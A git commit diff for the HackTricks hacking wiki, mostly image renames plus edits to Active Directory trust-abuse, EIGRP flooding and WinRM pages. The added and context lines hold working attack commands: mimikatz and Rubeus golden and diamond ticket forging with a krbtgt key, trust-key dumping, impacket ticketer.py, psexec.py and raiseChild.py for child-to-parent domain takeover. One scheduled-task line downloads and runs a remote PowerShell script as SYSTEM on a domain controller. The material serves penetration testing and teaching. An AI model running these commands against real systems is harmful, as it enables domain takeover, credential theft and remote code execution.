GitBook: [#3573] No subject

This commit is contained in:
CPol 2022-10-06 09:16:41 +00:00 committed by gitbook-bot
parent fb07c5b47f
commit 037cd042c2
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
27 changed files with 114 additions and 41 deletions

Binary file not shown.

Before

Width:  |  Height:  |  Size: 84 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 143 KiB

After

Width:  |  Height:  |  Size: 84 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 143 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 20 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 142 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 142 KiB

After

Width:  |  Height:  |  Size: 12 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 143 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 143 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 18 KiB

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 490 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 25 KiB

After

Width:  |  Height:  |  Size: 490 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 110 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 110 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 4.5 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 12 KiB

After

Width:  |  Height:  |  Size: 4.5 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 20 KiB

After

Width:  |  Height:  |  Size: 25 KiB

View file

@ -177,7 +177,7 @@
* [DCSync](windows-hardening/active-directory-methodology/dcsync.md) * [DCSync](windows-hardening/active-directory-methodology/dcsync.md)
* [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md) * [Diamond Ticket](windows-hardening/active-directory-methodology/diamond-ticket.md)
* [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md) * [DSRM Credentials](windows-hardening/active-directory-methodology/dsrm-credentials.md)
* [External Forest Domain - OneWay (Inbound)](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md) * [External Forest Domain - OneWay (Inbound) or bidirectional](windows-hardening/active-directory-methodology/external-forest-domain-oneway-inbound.md)
* [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md) * [External Forest Domain - One-Way (Outbound)](windows-hardening/active-directory-methodology/external-forest-domain-one-way-outbound.md)
* [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md) * [Golden Ticket](windows-hardening/active-directory-methodology/golden-ticket.md)
* [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md) * [Kerberoast](windows-hardening/active-directory-methodology/kerberoast.md)

View file

@ -105,7 +105,7 @@ Thus, after establishing the neighborhood, we know about the existence of these
**I have found that generating and quickly sending out mass EIGRP hello packets overloads the routers CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **Its caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually Ill rewrite the script in C.** **I have found that generating and quickly sending out mass EIGRP hello packets overloads the routers CPU, which in turn can open the door to a DoS attack.** I have developed a little [**helloflooding.py**](https://github.com/in9uz/EIGRPWN/blob/main/helloflooding.py) **** script, but it seems to me that the script lacks the speed of sending out the packets. **Its caused by GIL**, which prevents the **sprayhello** function from running in multiple threads per second. **Eventually Ill rewrite the script in C.**
<figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (2) (6).png" alt=""><figcaption></figcaption></figure>
Arguments of the script: Arguments of the script:
@ -173,7 +173,7 @@ Script arguments:
The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script** The essence of this attack is to provoke the sending of a huge number of false routes, which will overflow the routing table. This depletes the computing resources of the router, namely the CPU and RAM, since the injections occur at enormous speed. This attack is implemented [**routingtableoverflow.py**](https://github.com/in9uz/EIGRPWN/blob/main/routingtableoverflow.py) **script**
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3) (4).png" alt=""><figcaption></figcaption></figure>
Script arguments Script arguments
@ -187,7 +187,7 @@ in9uz@Inguz:~$ sudo python3 routingtableoverflow.py --interface eth0 --as 1 --sr
After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy). After running the script, the routing table starts overflowing with routes. The random addresses of the target networks are due to the use of **RandIP()** in [**Scapy**](https://github.com/secdev/scapy).
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure> <figure><img src="../../.gitbook/assets/image (4) (4).png" alt=""><figcaption><p>Routing table overflows on GW1 router</p></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure> <figure><img src="../../.gitbook/assets/image (21).png" alt=""><figcaption><p>Overloaded router CPU</p></figcaption></figure>

View file

@ -94,7 +94,7 @@ We need the `.bat` file, which will run when the application is deployed and exe
The next step is to choose `Install app from file` and upload the application. The next step is to choose `Install app from file` and upload the application.
<figure><img src="../.gitbook/assets/image (37).png" alt=""><figcaption></figcaption></figure> <figure><img src="../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat). Before uploading the malicious custom app, let's start a listener using Netcat or [socat](https://linux.die.net/man/1/socat).

View file

@ -281,7 +281,7 @@ In this case the attacker **won't receive the response timeout until he has send
Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here: Amazon's Application Load Balancer (ALB) will **stream the data of the connection as needed**, but if it **receives** the **response** to the half request (the timeout) **before** receiving the **body**, it **won't send the body**, so a **Race Condition** must be exploited here:
<figure><img src="../../.gitbook/assets/image (1) (1) (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1) (1) (2).png" alt=""><figcaption></figcaption></figure>
There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours. There's an additional complication when it comes to **exploiting Apache behind ALB** - **both servers** have a default **timeout of 60 seconds**. This leaves an **extremely small time-window** to send the second part of the request. The RC attack was ultimately successful after 66 hours.

View file

@ -532,17 +532,20 @@ It's important to notice that **a trust can be 1 way or 2 ways**. In the 2 ways
If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**. If Domain A trusts Domain B, A is the trusting domain and B ins the trusted one. Moreover, in **Domain A**, this would be an **Outbound trust**; and in **Domain B**, this would be an **Inbound trust**.
A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**. **Different trusting relationships**
**Different trusting relationships:** * **Parent-Child** part of the same forest a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that youll encounter.
* **Parent/Child** part of the same forest a child domain retains an implicit two-way transitive trust with its parent. This is probably the most common type of trust that youll encounter.
* **Cross-link** aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times. * **Cross-link** aka a “shortcut trust” between child domains to improve referral times. Normally referrals in a complex forest have to filter up to the forest root and then back down to the target domain, so for a geographically spread out scenario, cross-links can make sense to cut down on authentication times.
* **External** an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post. * **External** an implicitly non-transitive trust created between disparate domains. “[External trusts provide access to resources in a domain outside of the forest that is not already joined by a forest trust.](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx)” External trusts enforce SID filtering, a security protection covered later in this post.
* **Tree-root** an implicit two-way transitive trust between the forest root domain and the new tree root youre adding. I havent encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), theyre created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com). * **Tree-root** an implicit two-way transitive trust between the forest root domain and the new tree root youre adding. I havent encountered tree-root trusts too often, but from the [Microsoft documentation](https://technet.microsoft.com/en-us/library/cc773178\(v=ws.10\).aspx), theyre created when you create a new domain tree in a forest. These are intra-forest trusts, and they [preserve two-way transitivity](https://technet.microsoft.com/en-us/library/cc757352\(v=ws.10\).aspx) while allowing the tree to have a separate domain name (instead of child.parent.com).
* **Forest** a transitive trust between one forest root domain and another forest root domain. Forest trusts also enforce SID filtering. * **Forest** a transitive trust between two forest root domain. Forest trusts also enforce SID filtering.
* **MIT** a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future. * **MIT** a trust with a non-Windows [RFC4120-compliant](https://tools.ietf.org/html/rfc4120) Kerberos domain. I hope to dive more into MIT trusts in the future.
#### Other differences in **trusting relationships**
* A trust relationship can also be **transitive** (A trust B, B trust C, then A trust C) or **non-transitive**.
* A trust relationship can be set up as **bidirectional trust** (both trust each other) or as **one-way trust** (only one of them trust the other).
### Attack Path ### Attack Path
1. **Enumerate** the trusting relationships 1. **Enumerate** the trusting relationships
@ -599,7 +602,7 @@ It is possible to compromise the root domain in various ways. Examples:
* [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent) * [Schema attack](https://improsec.com/tech-blog/sid-filter-as-security-boundary-between-domains-part-6-schema-change-trust-attack-from-child-to-parent)
* Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins) * Exploit ADCS - Create/modify certificate template to allow authentication as any user (e.g. Enterprise Admins)
### External Forest Domain - One-Way (Inbound) ### External Forest Domain - One-Way (Inbound) or bidirectional
```powershell ```powershell
Get-DomainTrust Get-DomainTrust

View file

@ -89,7 +89,7 @@ Sometimes when creating a trust relationship, a password must be typed in by the
The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins: The cleartext password can be used to perform regular authentication as the trust account, an alternative to requesting a TGT using the Kerberos secret key of the trust account. Here, querying root.local from ext.local for members of Domain Admins:
![](<../../.gitbook/assets/image (1) (1) (1) (2).png>) ![](<../../.gitbook/assets/image (1) (1) (1).png>)
## References ## References

View file

@ -1,22 +1,18 @@
# External Forest Domain - OneWay (Inbound) # External Forest Domain - OneWay (Inbound) or bidirectional
<details> <details>
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>
In this scenario an external domain is trusting you, so you can get some kind of access over it. In this scenario an external domain is trusting you (or both are trusting each other), so you can get some kind of access over it.
## Enumeration ## Enumeration
@ -69,17 +65,25 @@ IsGroup : True
IsDomain : True IsDomain : True
# You may also enumerate where foreign groups and/or users have been assigned # You may also enumerate where foreign groups and/or users have been assigned
# local admin access via Restricted Group by enumerating the GPOs in the foreign domain. # local admin access via Restricted Group by enumerating the GPOs in the foreign domain.
``` ```
In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**. In the previous enumeration it was found that the user **`crossuser`** is inside the **`External Admins`** group who has **Admin access** inside the **DC of the external domain**.
## Initial Access
If you **couldn't** find any **special** access of your user in the other domain, you can still go back to the AD Methodology and try to **privesc from an unprivileged user** (things like kerberoasting for example):
{% content-ref url="./" %}
[.](./)
{% endcontent-ref %}
## Impersonation ## Impersonation
### With signing key ### With signing key
{% hint style="warning" %} {% hint style="warning" %}
As a reminder, you can get the signing key with&#x20; As a reminder, you can get the signing key with
```powershell ```powershell
Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local Invoke-Mimikatz -Command '"lsadump::trust /patch"' -ComputerName dc.my.domain.local
@ -119,14 +123,10 @@ Rubeus.exe asktgs /service:cifs/dc.doamin.external /domain:dc.domain.external /d
<summary><strong>Support HackTricks and get benefits!</strong></summary> <summary><strong>Support HackTricks and get benefits!</strong></summary>
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details> </details>

View file

@ -104,7 +104,7 @@ netsh advfirewall firewall add rule name=fwd dir=in action=allow protocol=TCP lo
Now establish the session, which will forward us to **the first server**. Now establish the session, which will forward us to **the first server**.
<figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
#### winrs.exe <a href="#winrsexe" id="winrsexe"></a> #### winrs.exe <a href="#winrsexe" id="winrsexe"></a>
@ -116,7 +116,7 @@ winrs -r:http://bizintel:5446 -u:ta\redsuit -p:2600leet hostname
Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_: Like `Invoke-Command`, this can be easily scripted so the attacker can simply issue system commands as an argument. A generic batch script example _winrm.bat_:
<figure><img src="../../.gitbook/assets/image (41).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (2).png" alt=""><figcaption></figcaption></figure>
### OpenSSH <a href="#openssh" id="openssh"></a> ### OpenSSH <a href="#openssh" id="openssh"></a>
@ -136,11 +136,11 @@ Download the latest [OpenSSH Release zip from github](https://github.com/PowerSh
Uncompress the zip to where youd like. Then, run the install script - `Install-sshd.ps1` Uncompress the zip to where youd like. Then, run the install script - `Install-sshd.ps1`
<figure><img src="../../.gitbook/assets/image (38).png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure>
Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work. Lastly, just add a firewall rule to **open port 22**. Verify the SSH services are installed, and start them. Both of these services will need to be running for SSH to work.
<figure><img src="../../.gitbook/assets/image.png" alt=""><figcaption></figcaption></figure> <figure><img src="../../.gitbook/assets/image (1).png" alt=""><figcaption></figcaption></figure>
If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory. If you receive a `Connection reset` error, update permissions to allow **Everyone: Read & Execute** on the root OpenSSH directory.

View file

@ -30,14 +30,16 @@ Get-DomainGroup -Identity "Domain Admins" -Domain parent.io -Properties ObjectSi
### Golden Ticket (Mimikatz) with KRBTGT-AES256 ### Golden Ticket (Mimikatz) with KRBTGT-AES256
{% code overflow="wrap" %}
```bash ```bash
mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit" mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid:<current_domain_sid> /sids:<victim_domain_sid_of_group> /aes256:<krbtgt_aes256> /startoffset:-10 /endin:600 /renewmax:10080 /ticket:ticket.kirbi" "exit"
/user is the username to impersonate. /user is the username to impersonate (could be anything)
/domain is the current domain. /domain is the current domain.
/sid is the current domain SID. /sid is the current domain SID.
/sids is the SID of the target group to add ourselves to. /sids is the SID of the target group to add ourselves to.
/aes256 is the AES256 key of the current domain's krbtgt account. /aes256 is the AES256 key of the current domain's krbtgt account.
--> You could also use /krbtgt:<HTML of krbtgt> instead of the "/aes256" option
/startoffset sets the start time of the ticket to 10 mins before the current time. /startoffset sets the start time of the ticket to 10 mins before the current time.
/endin sets the expiry date for the ticket to 60 mins. /endin sets the expiry date for the ticket to 60 mins.
/renewmax sets how long the ticket can be valid for if renewed. /renewmax sets how long the ticket can be valid for if renewed.
@ -45,6 +47,7 @@ mimikatz.exe "kerberos::golden /user:Administrator /domain:<current_domain> /sid
# The previous command will generate a file called ticket.kirbi # The previous command will generate a file called ticket.kirbi
# Just loading you can perform a dcsync attack agains the domain # Just loading you can perform a dcsync attack agains the domain
``` ```
{% endcode %}
For more info about golden tickets check: For more info about golden tickets check:
@ -54,10 +57,17 @@ For more info about golden tickets check:
### Diamond Ticket (Rubeus + KRBTGT-AES256) ### Diamond Ticket (Rubeus + KRBTGT-AES256)
{% code overflow="wrap" %}
```powershell ```powershell
# Use the /sids param # Use the /sids param
Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap Rubeus.exe diamond /tgtdeleg /ticketuser:Administrator /ticketuserid:500 /groups:512 /sids:S-1-5-21-378720957-2217973887-3501892633-512 /krbkey:390b2fdb13cc820d73ecf2dadddd4c9d76425d4c2156b89ac551efb9d591a8aa /nowrap
# Or a ptt with a golden ticket
Rubeus.exe golden /rc4:<krbtgt hash> /domain:<child_domain> /sid:<child_domain_sid> /sids:<parent_domain_sid>-519 /user:Administrator /ptt
# You can use "Administrator" as username or any other string
``` ```
{% endcode %}
For more info about diamond tickets check: For more info about diamond tickets check:
@ -65,21 +75,81 @@ For more info about diamond tickets check:
[diamond-ticket.md](diamond-ticket.md) [diamond-ticket.md](diamond-ticket.md)
{% endcontent-ref %} {% endcontent-ref %}
{% code overflow="wrap" %}
```bash ```bash
.\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local .\asktgs.exe C:\AD\Tools\kekeo_old\trust_tkt.kirbi CIFS/mcorp-dc.moneycorp.local
.\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi .\kirbikator.exe lsa .\CIFS.mcorpdc.moneycorp.local.kirbi
ls \\mcorp-dc.moneycorp.local\c$ ls \\mcorp-dc.moneycorp.local\c$
``` ```
{% endcode %}
Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain: Escalate to DA of root or Enterprise admin using the KRBTGT hash of the compromised domain:
{% code overflow="wrap" %}
```bash ```bash
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"' Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-211874506631-3219952063-538504511 /sids:S-1-5-21-280534878-1496970234700767426-519 /krbtgt:ff46a9d8bd66c6efd77603da26796f35 /ticket:C:\AD\Tools\krbtgt_tkt.kirbi"'
Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"' Invoke-Mimikatz -Command '"kerberos::ptt C:\AD\Tools\krbtgt_tkt.kirbi"'
gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local gwmi -class win32_operatingsystem -ComputerName mcorpdc.moneycorp.local
schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'" schtasks /create /S mcorp-dc.moneycorp.local /SC Weekely /RU "NT Authority\SYSTEM" /TN "STCheck114" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114" schtasks /Run /S mcorp-dc.moneycorp.local /TN "STCheck114"
``` ```
{% endcode %}
With the acquired permissions from the attack you can execute for example a DCSync attack in the new domain:
{% content-ref url="dcsync.md" %}
[dcsync.md](dcsync.md)
{% endcontent-ref %}
### From linux
#### Manual with [ticketer.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py)
{% code overflow="wrap" %}
```bash
# This is for an attack from child to root domain
# Get child domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep "Domain SID"
# Get root domain SID
lookupsid.py <child_domain>/username@10.10.10.10 | grep -B20 "Enterprise Admins" | grep "Domain SID"
# Generate golden ticket
ticketer.py -nthash <krbtgt_hash> -domain <child_domain> -domain-sid <child_domain_sid> -extra-sid <root_domain_sid> Administrator
# NOTE THAT THE USERNAME ADMINISTRATOR COULD BE ACTUALLY ANYTHING
# JUST USE THE SAME USERNAME IN THE NEXT STEPS
# Load ticket
export KRB5CCNAME=hacker.ccache
# psexec in domain controller of root
psexec.py <child_domain>/Administrator@dc.root.local -k -no-pass -target-ip 10.10.10.10
```
{% endcode %}
#### Automatic using [raiseChild.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/raiseChild.py)
This is an Impacket script which will **automate escalating from child to parent domain**. The script needs:
* Target domain controller
* Creds for an admin user in the child domain
The flow is:
* Obtains the SID for the Enterprise Admins group of the parent domain
* Retrieves the hash for the KRBTGT account in the child domain
* Creates a Golden Ticket
* Logs into the parent domain
* Retrieves credentials for the Administrator account in the parent domain
* If the `target-exec` switch is specified, it authenticates to the parent domain's Domain Controller via Psexec.
```bash
raiseChild.py -target-exec 10.10.10.10 <child_domain>/username
```
## References ## References

View file

@ -115,7 +115,7 @@ c:\Users\Public>
### Launch a new CMD (if you have RDP access) ### Launch a new CMD (if you have RDP access)
![](<../../.gitbook/assets/image (37) (1).png>) ![](<../../.gitbook/assets/image (37).png>)
## CLSID Problems ## CLSID Problems